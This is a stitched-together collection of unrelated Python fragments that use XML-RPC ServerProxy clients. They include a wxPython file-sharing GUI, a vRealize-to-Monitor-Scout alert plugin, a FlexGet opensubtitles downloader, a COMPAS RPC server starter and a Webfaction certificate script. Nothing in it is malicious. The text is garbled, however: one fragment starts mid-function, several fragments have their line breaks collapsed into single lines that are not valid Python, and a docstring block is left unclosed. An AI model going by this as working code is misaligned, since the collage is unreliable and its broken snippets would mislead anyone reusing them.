    server.stop(self.conf['bitrate'], self.conf['framerate'])
    child.terminate()
    child.join()
    VTLOG.info('PID: %s | Sniffer stopped' % child.pid)
    if ret:
        return None
    video = '/'.join([self.path, dict(self.videos)[self.conf['video']]])
    rtspclient.makeReference(video)
    conf = {
        'codec': self.conf['codec'],
        'bitrate': self.conf['bitrate'],
        'framerate': self.conf['framerate'],
        'caps': rtspclient.caps
    }
    # Extract per-packet and per-frame data, then run the three meters.
    packetdata = sniffer.parsePkts(self.conf['protocol'], rtspclient.caps)
    codecdata, rawdata = self.__parseVideo(rtspclient.files,
                                           rtspclient.caps,
                                           self.conf['codec'])
    results = []
    results.extend(QoSmeter(self.conf['qos'], packetdata).run())
    results.extend(BSmeter(self.conf['bs'], codecdata).run())
    results.extend(
        VQmeter(self.conf['vq'],
                (conf, rawdata, codecdata, packetdata)).run())
    VTLOG.info('Saving measures...')
    # Each measure is pickled to its own file next to the capture.
    for measure in results:
        f = open(tempdir + num + '_' + measure['name'] + '.pkl', 'wb')
        pickle.dump(measure, f)
        f.close()
    VTLOG.info('Client stopped!')
    return rtspclient.files, rtspclient.caps, results
class Client(wx.App):
    """wxPython GUI client for the peer-to-peer file sharing node.

    Starts a ListableNode in a daemon thread, talks to it over XML-RPC,
    and presents local/remote file listings with a fetch button.
    """

    def __init__(self, url, dirname, urlfile):
        """Start the node with a random secret and connect a proxy to it."""
        self.secret = randomString(SECRET_LENGTH)
        n = ListableNode(url, dirname, self.secret)
        t = Thread(target=n._start)
        t.setDaemon(1)
        t.start()
        # Give the node's server a head start before connecting.
        sleep(HEAD_START)
        self.server = ServerProxy(url)
        super(Client, self).__init__()

    def updateList(self):
        """Refresh the listing of files held by the local node."""
        self.files.Set(self.server.list())

    def updateRemoteList(self, remote_url):
        """Refresh the listing of files available at ``remote_url``."""
        self.remotefiles.Set(self.server.remoteList(remote_url))

    def OnInit(self):
        """Build the window: URL input, fetch button, two list boxes."""
        win = wx.Frame(None, title="File Share Tool", size=(800, 600))
        bkg = wx.Panel(win)
        self.urlinput = urlinput = wx.TextCtrl(
            bkg, -1, 'code the remote ip here', size=(200, 25))
        self.statusBar = win.CreateStatusBar()
        url_text = wx.StaticText(bkg, -1, 'remote URL:', size=(1, 25))
        self.localip_text = localip_text = wx.StaticText(
            bkg, -1, 'Local IP:%s' % getLocalIp(), size=(200, 20))
        submit = wx.Button(bkg, label="Fetch", size=(80, 25))
        submit.Bind(wx.EVT_BUTTON, self.getRemoteResource)

        hbox = wx.BoxSizer()
        hbox.Add(localip_text, proportion=1, flag=wx.ALL, border=10)
        hbox.Add(url_text, proportion=1, flag=wx.ALL, border=10)
        hbox.Add(urlinput, proportion=1, flag=wx.ALL | wx.ALIGN_RIGHT,
                 border=10)
        hbox.Add(submit, flag=wx.TOP | wx.BOTTOM | wx.RIGHT, border=10)

        self.files = files = wx.ListBox(bkg, size=(350, 400))
        self.remotefiles = remotefiles = wx.ListBox(bkg, size=(350, 400))
        self.remotefiles.Bind(wx.EVT_LISTBOX_DCLICK, self.listDClick)

        vbox = wx.BoxSizer(wx.VERTICAL)
        vbox.Add(hbox, proportion=0, flag=wx.EXPAND)
        hbox2 = wx.BoxSizer()
        hbox2.Add(remotefiles, proportion=1, flag=wx.ALL | wx.EXPAND,
                  border=10)
        hbox2.Add(files, proportion=1, flag=wx.ALL | wx.EXPAND, border=10)
        vbox.Add(hbox2, proportion=0, flag=wx.EXPAND)

        hbox3 = wx.BoxSizer()
        link = wx.lib.hyperlink.HyperLinkCtrl(parent=bkg, pos=(225, 60))
        link.SetURL(URL="http://www.the5fire.net")
        link.SetLabel(label=u"访问作者博客")
        link.SetToolTipString(tip="the5fire")
        hbox3.Add(link, proportion=0, flag=wx.EXPAND | wx.TOP, border=10)
        vbox.Add(hbox3, proportion=0, flag=wx.EXPAND)

        bkg.SetSizer(vbox)
        win.Show()
        self.updateList()
        return True

    def getRemoteResource(self, event):
        """Introduce ourselves to the remote node and list its files."""
        # BUG FIX: validate the raw input BEFORE formatting it into a URL;
        # the original compared the already-formatted URL to '' (never true)
        # and referenced 'sefl' (NameError) in the error branch.
        if self.urlinput.GetValue() == '':
            self.statusBar.SetStatusText('query url can not be null!')
            return
        query_url = 'http://%s:4242' % self.urlinput.GetValue()
        self.server.hello(query_url)
        self.updateRemoteList(query_url)

    def listDClick(self, event):
        """Fetch the file double-clicked in the remote listing."""
        query = self.remotefiles.GetString(self.remotefiles.GetSelection())
        self.fetchHandler(query)

    def fetchHandler(self, query):
        """Ask the local node to fetch ``query``; report the outcome."""
        if query == '':
            self.statusBar.SetStatusText('query string can not be null!')
            return
        try:
            self.server.fetch(query, self.secret)
            self.statusBar.SetStatusText(
                'download the file %s successed!' % query)
            self.updateList()
        except Fault as f:
            # Only swallow the node's "unhandled query" fault.
            if f.faultCode != UNHANDLED:
                raise
            self.statusBar.SetStatusText(
                "Counldn't find the file %s" % query)
# We need to create the temp environment print "Creating temporary environment..." env = setup_environment() print "Done. Sleeping to give the server time time to wake up..." cleanup = fork_start_server() print "Server set up!" uri = "http://127.1:8000/example_namespace/" ### # If you are reading this code to learn how to use PyOLS, # this is where you should start. ### print print "Client connecting to %s..." % (uri) from xmlrpclib import ServerProxy s = ServerProxy(uri) print "Connected. Importing 'doc/beer.owl'..." s.importOWL(file('doc/beer.owl').read()) print print "Some keywords in the ontology:" for (id, kwd) in enumerate(s.queryKeywords()): if id > 10: break print kwd['name'] + ':' if not kwd['left_relations']: print ' ' + '<no outbound relationships>' for rel in kwd['left_relations']: print ' ' + rel['relation']['name'], rel['right']['name']
class MonitorscoutPlugin(object):
    """Forward vRealize alerts to Monitor Scout as device alerts.

    CANCELED alerts close the matching ACTIVE device alert via the Monitor
    Scout XML-RPC API; all other statuses create a device alert through the
    REST endpoint.
    """

    plugin_name = 'MonitorscoutPlugin'

    def __init__(self, config, logging, **kw):
        """Read API endpoints/credentials from config and log in to the RPC API.

        The alert to forward is passed as the 'alert' keyword argument.
        """
        self.l = logging
        self.config = config
        alert = kw.get('alert')
        self.headers = {
            'X-Auth-API-Key': config.get(self.plugin_name, 'api_key'),
            'X-Requested-With': 'vRealize Alerts API',
            'Content-Type': 'application/json',
        }
        self.create_url = '{url}/{device}/create_alert'.format(
            url=config.get(self.plugin_name, 'api_url'),
            device=config.get(self.plugin_name, 'device_id'))
        self.close_url = '{url}/{device}/close_alert'.format(
            url=config.get(self.plugin_name, 'api_url'),
            device=config.get(self.plugin_name, 'device_id'))

        alert_name = '{resourceName} {status}'.format(
            resourceName=alert.resourceName, status=alert.status)
        alert_msg = '{startDate}: \n{info}'.format(startDate=alert.startDate,
                                                   info=alert.info)
        self.alert_data = {'name': alert_name, 'error_msg': alert_msg}
        self.alert = alert

        # Connect to MS RPC API (only when the RPC endpoint is configured).
        if config.has_option('MonitorscoutPlugin', 'rpc_api_url'):
            api_url = config.get('MonitorscoutPlugin', 'rpc_api_url')
            api_username = config.get('MonitorscoutPlugin',
                                      'rpc_api_username')
            api_password = config.get('MonitorscoutPlugin',
                                      'rpc_api_password')
            if config.has_option('MonitorscoutPlugin', 'rpc_api_account'):
                api_account = config.get('MonitorscoutPlugin',
                                         'rpc_api_account')
            else:
                api_account = None
            self.ms = ServerProxy(api_url)
            self.ms_sid = self.ms.login(api_username, api_password,
                                        api_account)

    def run(self):
        """Close the device alert for CANCELED statuses; create one otherwise."""
        config = self.config
        log = self.l
        # Close any ACTIVE device alerts that have been created with the
        # same resourceName in MS.
        if self.alert.status == 'CANCELED':
            try:
                self.close_device_alert()
            except Exception as e:
                log.exception('Exception while trying to close device alert')
                # Continue anyways because it might mean MS RPC API is
                # unconfigured.
                pass
        else:
            r = self.make_device_alert()
            if r.status_code == 200:
                log.info('Created device alert successfully')
            else:
                log.error(
                    'Error creating device alert: {text}'.format(text=r.text))

    def make_device_alert(self):
        """Create the device alert via the REST API; returns the response."""
        return requests.put(self.create_url,
                            headers=self.headers,
                            data=json.dumps(self.alert_data))

    def close_device_alert(self):
        """Close every ACTIVE device alert whose name matches this resource."""
        device_alerts = self.ms.device.get_alerts(
            self.ms_sid, self.config.get('MonitorscoutPlugin', 'device_id'))
        # These values do not depend on the entity being inspected, so
        # compute them once instead of on every loop iteration.
        log = self.l
        alert_name = '{resourceName} ACTIVE'.format(
            resourceName=self.alert.resourceName)
        alert_data = {'name': alert_name}
        for entity_id, entity in device_alerts.get('entity_data').items():
            if entity.get('type', '') != 'device_alert':
                continue
            if entity.get('name', '') == alert_name:
                res = requests.put(self.close_url,
                                   headers=self.headers,
                                   data=json.dumps(alert_data))
                if res.status_code == 200:
                    log.info('Closed device alert {id} successfully'.format(
                        id=entity.get('id', '')))
                else:
                    log.error('Error closing device alert {id}: {text}'.format(
                        id=entity.get('id', ''), text=res.text))
#Job is complete, retrieve results job_output_path = os.path.join(job_output_drop, job_id + '.ase') retrieve_cmd = "copy %s %s" % (job_output_path, target_intermediate_file) print "Launching %s" % retrieve_cmd ret = os.system(retrieve_cmd) #ideally the copy sets the proper name on the target intermediate file return if __name__ == "__main__": test_input_file = '..\\test_data\\max\\box.max' test_output_file = '..\\box.ase' jobserverproxy = ServerProxy("http://localhost:8000") max2ase([test_output_file], [test_input_file], None) # server = ServerProxy("http://localhost:8000") # local server """ job_id = proxy.setup_job('max','ase') print job_id status = proxy.query_job_status(job_id) status_str = get_status_string(status) print "Status: %s" % (status_str) #Start the job proxy.start_job(job_id) #Check the status again #status = proxy.query_job_status(job_id) status = proxy.query_job_status(job_id) status_str = get_status_string(status)
#!/usr/bin/python2 from xmlrpclib import ServerProxy import datetime s = ServerProxy('http://localhost:8080') print s.testFunc('abc') print s.testFunc(1) print s.testFunc(True) print s.testFunc(0.5) print s.testFunc(datetime.datetime.now()) print s.testFunc({'a':1, 'b':2, 'c':3})
def start_server(self):
    """Start the remote server.

    Returns
    -------
    ServerProxy
        Instance of the proxy, if the connection was successful.

    Raises
    ------
    RPCServerError
        If the server providing the requested service cannot be reached
        after 100 contact attempts (*pings*). The number of attempts is set
        by :attr:`Proxy.max_conn_attempts`.

    Examples
    --------
    >>> p = Proxy()  # doctest: +SKIP
    >>> p.stop_server()  # doctest: +SKIP
    >>> p.start_server()  # doctest: +SKIP
    """
    env = compas._os.prepare_environment()
    # this part starts the server side of the RPC setup
    # it basically launches a subprocess
    # to start the default service
    # the default service creates a server
    # and registers a dispatcher for custom functionality
    try:
        # Probe whether subprocess.Popen is available in this host.
        Popen
    except NameError:
        # `Popen` is undefined: presumably an IronPython/.NET host —
        # fall back to System.Diagnostics.Process.  TODO(review): confirm
        # which runtime this branch targets.
        self._process = Process()
        # Copy the prepared environment into the child process, updating
        # keys that already exist and adding the rest.
        for name in env:
            if self._process.StartInfo.EnvironmentVariables.ContainsKey(
                    name):
                self._process.StartInfo.EnvironmentVariables[name] = env[
                    name]
            else:
                self._process.StartInfo.EnvironmentVariables.Add(
                    name, env[name])
        self._process.StartInfo.UseShellExecute = False
        self._process.StartInfo.RedirectStandardOutput = self.capture_output
        self._process.StartInfo.RedirectStandardError = self.capture_output
        self._process.StartInfo.FileName = self.python
        self._process.StartInfo.Arguments = '-m {0} --port {1} --{2}autoreload'.format(
            self.service, self._port, '' if self.autoreload else 'no-')
        self._process.Start()
    else:
        # CPython path: spawn `python -m <service> --port <port>
        # --[no-]autoreload` with the prepared environment.
        args = [
            self.python, '-m', self.service, '--port',
            str(self._port),
            '--{}autoreload'.format('' if self.autoreload else 'no-')
        ]
        kwargs = dict(env=env)
        if self.capture_output:
            kwargs['stdout'] = PIPE
            kwargs['stderr'] = PIPE
        self._process = Popen(args, **kwargs)
    # this starts the client side
    # it creates a proxy for the server
    # and tries to connect the proxy to the actual server
    server = ServerProxy(self.address)
    print("Starting a new proxy server...")
    success = False
    attempt_count = 0
    # Poll the server with `ping` until it answers or the attempt
    # budget is exhausted.
    while attempt_count < self.max_conn_attempts:
        try:
            server.ping()
        except Exception:
            # Server not up yet: back off briefly and retry.
            time.sleep(0.1)
            attempt_count += 1
            print(" {} attempts left.".format(
                self.max_conn_attempts - attempt_count))
        else:
            success = True
            break
    if not success:
        raise RPCServerError("The server is not available.")
    else:
        print("New proxy server started.")
    return server
def paste(self, lodgeit_url): """Create a paste and return the paste id.""" from xmlrpclib import ServerProxy srv = ServerProxy('%sxmlrpc/' % lodgeit_url) return srv.pastes.newPaste('pytb', self.plaintext)
def on_task_download(self, task, config):
    """Fetch subtitles from opensubtitles.org for accepted entries.

    For every accepted entry with an ``imdb_id``, searches the
    opensubtitles.org XML-RPC API per configured language, filters out
    bad/low-rated subs, keeps only those whose release name resembles
    the entry title, and downloads the best-rated sub per language into
    ``config['output']``.
    """
    # filter all entries that have IMDB ID set
    try:
        entries = [e for e in task.accepted if e['imdb_id'] is not None]
    except KeyError:
        # No imdb urls on this task, skip it
        # TODO: should do lookup via imdb_lookup plugin?
        return
    try:
        s = ServerProxy("http://api.opensubtitles.org/xml-rpc")
        res = s.LogIn("", "", "en", "FlexGet")
    except Exception:
        # was a bare `except:` — narrowed so KeyboardInterrupt/SystemExit
        # are not swallowed
        log.warning('Error connecting to opensubtitles.org')
        return
    if res['status'] != '200 OK':
        raise Exception(
            "Login to opensubtitles.org XML-RPC interface failed")
    config = self.prepare_config(config, task)
    token = res['token']
    # configuration
    languages = config['languages']
    min_sub_rating = config['min_sub_rating']
    match_limit = config[
        'match_limit']  # no need to change this, but it should be configurable
    # loop through the entries
    for entry in entries:
        imdbid = entry.get('imdb_id')
        if not imdbid:
            log.debug('no match for %s' % entry['title'])
            continue
        query = []
        for language in languages:
            query.append({'sublanguageid': language, 'imdbid': imdbid})
        subtitles = s.SearchSubtitles(token, query)
        subtitles = subtitles['data']
        # nothing found -> continue
        if not subtitles:
            continue
        # filter bad subs
        subtitles = [x for x in subtitles if x['SubBad'] == '0']
        # some quality required (0.0 == not reviewed)
        subtitles = [
            x for x in subtitles
            if float(x['SubRating']) >= min_sub_rating
            or float(x['SubRating']) == 0.0
        ]
        filtered_subs = []
        # find the best rated subs for each language
        for language in languages:
            langsubs = [
                x for x in subtitles if x['SubLanguageID'] == language
            ]
            # did we find any subs for this language?
            if langsubs:
                def seqmatch(subfile):
                    matcher = difflib.SequenceMatcher(
                        lambda x: x in " ._", entry['title'], subfile)
                    #print "matching: ", entry['title'], subfile, matcher.ratio()
                    return matcher.ratio() > match_limit

                # filter only those that have matching release names.
                # BUG FIX: the original filtered `subtitles` (all
                # languages) here, so a sub in the wrong language could
                # be selected; filter the language-specific list instead.
                langsubs = [
                    x for x in langsubs if seqmatch(x['MovieReleaseName'])
                ]
                if langsubs:
                    # find the best one by SubRating (highest first)
                    langsubs.sort(key=lambda x: float(x['SubRating']),
                                  reverse=True)
                    filtered_subs.append(langsubs[0])
        # download
        for sub in filtered_subs:
            # BUG FIX: log.debug was called with bare positional args and
            # no format placeholders; use lazy %-style formatting.
            log.debug('SUBS FOUND: %s %s %s', sub['MovieReleaseName'],
                      sub['SubRating'], sub['SubLanguageID'])
            f = urlopener(sub['ZipDownloadLink'], log)
            subfilename = re.match(
                '^attachment; filename="(.*)"$',
                f.info()['content-disposition']).group(1)
            outfile = os.path.join(config['output'], subfilename)
            # BUG FIX: the payload is a zip archive — write it in binary
            # mode ('w' corrupts it on Windows); `with` guarantees close.
            with open(outfile, 'wb') as fp:
                fp.write(f.read())
            f.close()
    s.LogOut(token)
def temp(x=1,y=1): s2 = ServerProxy("http://192.168.2.153:49000") s2.StartMonitor(x,y)
def remoteList(self, remote_url): #print 'get remotelist' s = ServerProxy(remote_url) return s.list()
def __init__(self, srvUrl, devKey): self.server = ServerProxy(srvUrl, verbose=False) self.devKey = devKey
domain_cert, pv_key, intermediate_cert = '', '', '' # Directory declarations in order to know where to work valid_cert_dir = '{home}/{acme}/{domain}'.\ format(home=environ.get('HOME'), acme=HIDDEN_ACME_DIR_NAME, domain=d.get('domain')) # Change directory to the one that matches our domain chdir(valid_cert_dir) # Test if current working directory is the valid one try: assert getcwd() == valid_cert_dir except AssertionError: exit('Current working directory is not {}! Instead is {}.'.format(valid_cert_dir, getcwd())) # try to connect to Webfaction API try: server = ServerProxy(d.get('url')) session_id, _ = server.login(d.get('user'), d.get('pwd'), d.get('s_name'), d.get('version')) except Fault as e: exit("Exception occurred at connection with Webfaction's API. {}".format(e)) else: # Connection is successful. Proceed... # read domain certificate and store it as a variable domain_cert = data_to_var('{}.cer'.format(d.get('domain'))) # read private key certificate and store it as a variable pv_key = data_to_var('{}.key'.format(d.get('domain'))) # read intermediate certificate and store it as a variable intermediate_cert = data_to_var('ca.cer')